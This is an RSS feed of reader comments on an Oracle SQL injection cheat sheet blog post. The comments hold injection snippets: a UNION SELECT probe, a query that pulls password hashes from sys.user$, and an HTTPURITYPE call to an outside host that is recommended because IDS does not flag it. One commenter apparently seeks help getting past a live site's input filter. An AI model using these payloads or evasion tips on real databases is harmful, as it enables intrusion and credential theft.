<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
  <title>ORACLE SQL Injection Cheat Sheet - Yorumlar</title>
  <description>Ferruh Mavituna - Me, Myself and My Alter Ego...</description>
  <copyright>Ferruh Mavituna</copyright>
  <link>http://ferruh.mavituna.com</link>
  <lastBuildDate>Paz, 12 Şub 2012 16:41:50 +0200</lastBuildDate>
  <image>
    <title>Ferruh Mavituna</title>
    <link>http://ferruh.mavituna.com</link>
    <url>http://ferruh.mavituna.com/rss/rss.gif</url>
  </image>
  <item>
  <title>deniz</title>
  <link>http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/</link>
  <author>deniz</author>
  <pubDate>Per, 02 Ara 2010 17:44:21 +0200</pubDate>
  <description>           can we use httpuritype in sql functions such as length without using select like&lt;br /&gt;&lt;br /&gt;length(HTTPURITYPE('http://www.red-database-security.com').getXML())  &lt;br /&gt;&lt;br /&gt;as in MSSQL queris like len(db_name())</description>
</item>
<item>
  <title>Yasin &#214;zel</title>
  <link>http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/</link>
  <author>Yasin &#214;zel</author>
  <pubDate>Cum, 23 Nis 2010 16:47:52 +0200</pubDate>
  <description>           Birde;&lt;br /&gt; UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 FROM all_tables&lt;br /&gt;Yazdigimda ;&lt;br /&gt;ifade kendisine kar&amp;#254;&amp;#253;l&amp;#253;k gelen ifade ile ayn&amp;#253; veri t&amp;#252;r&amp;#252;nde olmal&amp;#253;d&amp;#253;r &lt;br /&gt;&lt;br /&gt;hatasini veriyor. Neden kaynaklanir bu sorun</description>
</item>
<item>
  <title>Yasin &#214;zel</title>
  <link>http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/</link>
  <author>Yasin &#214;zel</author>
  <pubDate>Cum, 23 Nis 2010 16:45:40 +0200</pubDate>
  <description>           Ferruh abi aynen dedigin gibi yapiyorum ama sanirsam mantiksal operat&amp;#246;rlere karsi filitrelenmis.. &amp;lt;&amp;gt; = &amp;lt; &amp;gt; &amp;gt;= &amp;lt;= gibi operat&amp;#246;rlen engellenmis. TABLESPACE_NAME = CHR(USERS) yaparken = oldugu i&amp;#231;in sayfa hata sayfasina atiyor.. &amp;quot;TABLESPACE_NAME = CHR(USERS)&amp;quot; koymayincada&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80004005'&lt;br /&gt;&lt;br /&gt;[Oracle][ODBC][Ora]ORA-00936: eksik ifade &lt;br /&gt;&lt;br /&gt;hatasini veriyor.. Sence ne yapabilirim ?</description>
</item>
<item>
  <title>harsh</title>
  <link>http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/</link>
  <author>harsh</author>
  <pubDate>Çar, 10 Mar 2010 13:27:41 +0200</pubDate>
  <description>           jhello...this is  geat expierence /......</description>
</item>
<item>
  <title>rem7ter</title>
  <link>http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/</link>
  <author>rem7ter</author>
  <pubDate>Cmt, 22 Kas 2008 08:43:02 +0200</pubDate>
  <description>           thanks!but not sure that is useful</description>
</item>
<item>
  <title>Deep Power</title>
  <link>http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/</link>
  <author>Deep Power</author>
  <pubDate>Per, 16 Eki 2008 16:51:49 +0200</pubDate>
  <description>           Ferruh abi iyi g&amp;#252;zel de ingilizce.Ingilizcem o kadar iyi degildir.En iyisi sen bunu tr ye &amp;#231;evir.Bir lise ogrencisi i&amp;#231;in zor : )&lt;br /&gt;Selametle...</description>
</item>
<item>
  <title>Ferruh Mavituna</title>
  <link>http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/</link>
  <author>Ferruh Mavituna</author>
  <pubDate>Sal, 02 Eki 2007 23:42:22 +0200</pubDate>
  <description>           Alexandar,&lt;br /&gt;Thanks for your comments. I'm quite new in ORACLE stuff. I updated current list according to your comments. </description>
</item>
<item>
  <title>Alexander Kornbrust</title>
  <link>http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/</link>
  <author>Alexander Kornbrust</author>
  <pubDate>Sal, 02 Eki 2007 22:18:19 +0200</pubDate>
  <description>           Nice list but some of the statements are too complicated:&lt;br /&gt;&lt;br /&gt;e.g. &lt;br /&gt;          SELECT username, FROM all_users UNION SELECT name, password FROM sys.user$&lt;br /&gt;better: SELECT name, password FROM sys.user$ where type#=1&lt;br /&gt;&lt;br /&gt;or&lt;br /&gt;use httpuritype instead of utl_http. utl_http is often removed from public. httpuritype works also and is not flagged by IDS:&lt;br /&gt;     SELECT HTTPURITYPE('http://www.red-database-security.com').getXML() FROM DUAL;&lt;br /&gt;&lt;br /&gt;</description>
</item>

</channel>
</rss>
